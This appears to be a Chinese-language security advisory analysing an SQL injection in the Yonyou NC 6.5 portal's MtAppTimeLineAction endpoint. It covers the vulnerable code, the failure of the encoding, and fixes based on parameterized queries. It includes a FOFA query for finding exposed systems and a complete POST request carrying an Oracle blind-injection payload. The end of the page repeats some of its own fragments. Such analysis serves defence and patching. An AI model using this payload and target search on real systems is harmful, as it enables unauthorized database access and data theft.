用友NC Portal端MtAppTimeLineAction接口SQL注入漏洞分析<\/h1>

一、漏洞概述<\/h2>
用友NC系统的Portal端MtAppTimeLineAction接口存在SQL注入安全漏洞，攻击者可通过构造恶意参数未经授权访问数据库，导致敏感数据泄露。<\/p>

二、影响版本<\/h2>

用友NC 6.5版本<\/li> <\/ul>

三、漏洞定位<\/h2>

3.1 漏洞文件路径<\/h3>

nc\/bs\/oa\/oamt\/action\/MtAppTimeLineAction.class
<\/code><\/pre>
3.2 漏洞触发方法<\/h3>
doApply()<\/code>方法<\/p>
四、漏洞原理分析<\/h2>
4.1 漏洞代码分析<\/h3>
MtAppTimeLineAction.class中的关键代码：<\/strong><\/p>
public<\/span> void<\/span> doApply<\/span>()<\/span> {<\/span>
<\/span><\/span>    HttpServletRequest request =<\/span> this<\/span>.<\/span>request<\/span>;<\/span>
<\/span><\/span>    String maEventPk =<\/span> request.<\/span>getParameter<\/span>(<\/span>"meapk"<\/span>);<\/span>
<\/span><\/span>    IMeetingApplyQueryService qs =<\/span> (<\/span>IMeetingApplyQueryService)<\/span>NCLocator.<\/span>getInstance<\/span>().<\/span>lookup<\/span>(<\/span>IMeetingApplyQueryService.<\/span>class<\/span>);<\/span>
<\/span><\/span>    String whereSQL =<\/span> "pk_mtappdoc='"<\/span> +<\/span> NCESAPI.<\/span>sqlEncode<\/span>(<\/span>maEventPk)<\/span> +<\/span> "'"<\/span>;<\/span>
<\/span><\/span>    
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        MeetingApplyEventVO[]<\/span> maEvents =<\/span> qs.<\/span>queryMeetingApplyEvents<\/span>(<\/span>whereSQL,<\/span> (<\/span>SQLParameter)<\/span>null<\/span>);<\/span>
<\/span><\/span>        \/\/ ...后续处理代码
<\/span><\/span><\/span><\/span>    }<\/span> catch<\/span> (<\/span>BusinessException var8)<\/span> {<\/span>
<\/span><\/span>        \/\/ 异常处理
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4.2 SQL查询链分析<\/h3>
queryMeetingApplyEvents方法调用链：<\/strong><\/p>
\/\/ 第一层调用
<\/span><\/span><\/span><\/span>public<\/span> MeetingApplyEventVO[]<\/span> queryMeetingApplyEvents<\/span>(<\/span>String sqlWhere,<\/span> SQLParameter sqlParam)<\/span> throws<\/span> BusinessException {<\/span>
<\/span><\/span>    return<\/span> this<\/span>.<\/span>getDAO<\/span>().<\/span>queryMeetingApplyEvents<\/span>(<\/span>sqlWhere,<\/span> sqlParam);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 第二层调用（DAO层）
<\/span><\/span><\/span><\/span>public<\/span> MeetingApplyEventVO[]<\/span> queryMeetingApplyEvents<\/span>(<\/span>String sqlWhere,<\/span> SQLParameter sqlParam)<\/span> throws<\/span> BusinessException {<\/span>
<\/span><\/span>    StringBuilder sd =<\/span> new<\/span> StringBuilder();<\/span>
<\/span><\/span>    sd.<\/span>append<\/span>(<\/span>"select a.pk_mtappdoc, a.pk_mtapp, a.subject, a.starttime, a.endtime, a.meetingroom, a.applier, b.name as applier_name, a.APPROVE_STATE, a.approver, a.operator,a.bill_code "<\/span>);<\/span>
<\/span><\/span>    sd.<\/span>append<\/span>(<\/span>"from OAMT_MTAPP a, BD_PSNDOC b where a.applier=b.PK_PSNDOC "<\/span>);<\/span>
<\/span><\/span>    
<\/span><\/span>    if<\/span> (<\/span>StringUtils.<\/span>isNotEmpty<\/span>(<\/span>sqlWhere))<\/span> {<\/span>
<\/span><\/span>        sd.<\/span>append<\/span>(<\/span>" and "<\/span>).<\/span>append<\/span>(<\/span>sqlWhere);<\/span>  \/\/ 漏洞点：直接拼接用户输入
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    MeetingApplyEventVO[]<\/span> meetingApplyEventVOs =<\/span> (<\/span>MeetingApplyEventVO[])<\/span>this<\/span>.<\/span>executeQueryVOs<\/span>(<\/span>sd.<\/span>toString<\/span>(),<\/span> MeetingApplyEventVO.<\/span>class<\/span>);<\/span>
<\/span><\/span>    return<\/span> meetingApplyEventVOs;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4.3 编码绕过机制分析<\/h3>
NCESAPI.sqlEncode编码逻辑：<\/strong><\/p>
public<\/span> String encode<\/span>(<\/span>char<\/span>[]<\/span> immune,<\/span> String input)<\/span> {<\/span>
<\/span><\/span>    StringBuilder sb =<\/span> new<\/span> StringBuilder();<\/span>
<\/span><\/span>    boolean<\/span> encoding =<\/span> false<\/span>;<\/span>
<\/span><\/span>    boolean<\/span> inquotes =<\/span> false<\/span>;<\/span>
<\/span><\/span>    
<\/span><\/span>    for<\/span>(<\/span>int<\/span> i =<\/span> 0<\/span>;<\/span> i <<\/span> input.<\/span>length<\/span>();<\/span> ++<\/span>i)<\/span> {<\/span>
<\/span><\/span>        char<\/span> c =<\/span> input.<\/span>charAt<\/span>(<\/span>i);<\/span>
<\/span><\/span>        
<\/span><\/span>        if<\/span> (!<\/span>containsCharacter(<\/span>c,<\/span> EncoderConstants.<\/span>CHAR_ALPHANUMERICS<\/span>)<\/span> &&<\/span> !<\/span>containsCharacter(<\/span>c,<\/span> immune))<\/span> {<\/span>
<\/span><\/span>            \/\/ 非字母数字字符处理逻辑
<\/span><\/span><\/span><\/span>            if<\/span> (<\/span>inquotes &&<\/span> i <<\/span> input.<\/span>length<\/span>())<\/span> {<\/span>
<\/span><\/span>                sb.<\/span>append<\/span>(<\/span>"\""<\/span>);<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>            if<\/span> (<\/span>i ><\/span> 0<\/span>)<\/span> {<\/span>
<\/span><\/span>                sb.<\/span>append<\/span>(<\/span>"&"<\/span>);<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>            sb.<\/span>append<\/span>(<\/span>this<\/span>.<\/span>encodeCharacter<\/span>(<\/span>immune,<\/span> c));<\/span>
<\/span><\/span>            inquotes =<\/span> false<\/span>;<\/span>
<\/span><\/span>            encoding =<\/span> true<\/span>;<\/span>
<\/span><\/span>        }<\/span> else<\/span> {<\/span>
<\/span><\/span>            \/\/ 字母数字字符处理
<\/span><\/span><\/span><\/span>            if<\/span> (<\/span>encoding &&<\/span> i ><\/span> 0<\/span>)<\/span> {<\/span>
<\/span><\/span>                sb.<\/span>append<\/span>(<\/span>"&"<\/span>);<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>            if<\/span> (!<\/span>inquotes &&<\/span> i ><\/span> 0<\/span>)<\/span> {<\/span>
<\/span><\/span>                sb.<\/span>append<\/span>(<\/span>"\""<\/span>);<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>            sb.<\/span>append<\/span>(<\/span>c);<\/span>
<\/span><\/span>            inquotes =<\/span> true<\/span>;<\/span>
<\/span><\/span>            encoding =<\/span> false<\/span>;<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    return<\/span> sb.<\/span>toString<\/span>();<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> String encodeCharacter<\/span>(<\/span>char<\/span>[]<\/span> immune,<\/span> Character c)<\/span> {<\/span>
<\/span><\/span>    char<\/span> ch =<\/span> c;<\/span>
<\/span><\/span>    if<\/span> (<\/span>containsCharacter(<\/span>ch,<\/span> immune))<\/span> {<\/span>
<\/span><\/span>        return<\/span> ""<\/span> +<\/span> ch;<\/span>
<\/span><\/span>    }<\/span> else<\/span> {<\/span>
<\/span><\/span>        String hex =<\/span> Codec.<\/span>getHexForNonAlphanumeric<\/span>(<\/span>ch);<\/span>
<\/span><\/span>        return<\/span> hex ==<\/span> null<\/span> ?<\/span> ""<\/span> +<\/span> ch :<\/span> "chrw("<\/span> +<\/span> c +<\/span> ")"<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4.4 编码绕过原理<\/h3>

编码规则<\/strong>：字母数字字符原样保留，其他字符转换为chrw(...)<\/code>形式<\/li>
绕过原理<\/strong>：数据库会将chrw(40)<\/code>解析为(<\/code>，chrw(61)<\/code>解析为=<\/code>，语义保持不变<\/li>
关键点<\/strong>：虽然输入被编码，但SQL语义在数据库层面保持不变，导致注入依然可行<\/li>
<\/ol>
五、漏洞验证<\/h2>
5.1 资产识别<\/h3>
FOFA搜索语法：<\/strong><\/p>
app="用友-UFIDA-NC"
<\/code><\/pre>
5.2 POC验证<\/h3>
POST<\/span> \/portal\/pt\/mtapptimeline\/doApply HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> [目标地址]<\/span>
<\/span><\/span>User-Agent:<\/span> Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko\/20100101 Firefox\/139.0<\/span>
<\/span><\/span>Accept:<\/span> text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8<\/span>
<\/span><\/span>Accept-Language:<\/span> zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2<\/span>
<\/span><\/span>Accept-Encoding:<\/span> gzip, deflate<\/span>
<\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span>
<\/span><\/span>
<\/span><\/span>pageId=login&meapk=1' AND 7722=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(122)||CHR(106)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (7722=7722) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(120)||CHR(98)||CHR(113))-- Jvzs
<\/span><\/span><\/code><\/pre>5.3 POC说明<\/h3>

使用CHR()<\/code>函数绕过编码检测<\/li>
通过布尔盲注技术验证漏洞存在性<\/li>
利用Oracle数据库的UTL_INADDR.GET_HOST_ADDRESS<\/code>函数<\/li>
<\/ul>
六、漏洞危害<\/h2>

数据泄露<\/strong>：攻击者可获取数据库中的敏感信息<\/li>
权限提升<\/strong>：可能通过SQL注入获取系统更高权限<\/li>
系统控制<\/strong>：在特定条件下可能实现远程代码执行<\/li>
<\/ol>
七、修复建议<\/h2>
7.1 立即措施<\/h3>

安装用友官方发布的最新安全补丁<\/li>
对系统进行安全评估和漏洞扫描<\/li>
<\/ol>
7.2 代码修复方案<\/h3>
原问题代码：<\/strong><\/p>
String whereSQL =<\/span> "pk_mtappdoc='"<\/span> +<\/span> NCESAPI.<\/span>sqlEncode<\/span>(<\/span>maEventPk)<\/span> +<\/span> "'"<\/span>;<\/span>
<\/span><\/span><\/code><\/pre>修复方案：<\/strong><\/p>
\/\/ 方案1：使用预编译语句
<\/span><\/span><\/span><\/span>String sql =<\/span> "pk_mtappdoc = ?"<\/span>;<\/span>
<\/span><\/span>SQLParameter param =<\/span> new<\/span> SQLParameter();<\/span>
<\/span><\/span>param.<\/span>addParam<\/span>(<\/span>maEventPk);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 方案2：使用框架提供的安全查询方法
<\/span><\/span><\/span><\/span>MeetingApplyEventVO[]<\/span> maEvents =<\/span> qs.<\/span>queryMeetingApplyEventsWithParam<\/span>(<\/span>sql,<\/span> param);<\/span>
<\/span><\/span><\/code><\/pre>7.3 长期防护措施<\/h3>

输入验证<\/strong>：实施严格的白名单输入验证机制<\/li>
参数化查询<\/strong>：全面采用参数化查询替代字符串拼接<\/li>
最小权限原则<\/strong>：数据库连接使用最小必要权限账户<\/li>
安全编码培训<\/strong>：加强开发人员安全编码意识<\/li>
定期安全审计<\/strong>：建立代码安全审计机制<\/li>
<\/ol>
八、技术总结<\/h2>
该漏洞的根本原因在于开发人员过度依赖编码函数提供的安全性，未能正确理解编码与参数化查询的本质区别。编码函数只能防止某些特定类型的攻击，但不能替代参数化查询提供的真正安全防护。<\/p>

用友NC Portal端MtAppTimeLineAction接口SQL注入漏洞分析<\/h1>

一、漏洞概述<\/h2> 用友NC系统的Portal端MtAppTimeLineAction接口存在SQL注入安全漏洞，攻击者可通过构造恶意参数未经授权访问数据库，导致敏感数据泄露。<\/p>

三、漏洞定位<\/h2>

3.2 漏洞触发方法<\/h3> doApply()<\/code>方法<\/p>

五、漏洞验证<\/h2>

七、修复建议<\/h2>

八、技术总结<\/h2> 该漏洞的根本原因在于开发人员过度依赖编码函数提供的安全性，未能正确理解编码与参数化查询的本质区别。编码函数只能防止某些特定类型的攻击，但不能替代参数化查询提供的真正安全防护。<\/p>

一、漏洞概述<\/h2>
用友NC系统的Portal端MtAppTimeLineAction接口存在SQL注入安全漏洞，攻击者可通过构造恶意参数未经授权访问数据库，导致敏感数据泄露。<\/p>

3.2 漏洞触发方法<\/h3>
`doApply()<\/code>方法<\/p>`

八、技术总结<\/h2>
该漏洞的根本原因在于开发人员过度依赖编码函数提供的安全性，未能正确理解编码与参数化查询的本质区别。编码函数只能防止某些特定类型的攻击，但不能替代参数化查询提供的真正安全防护。<\/p>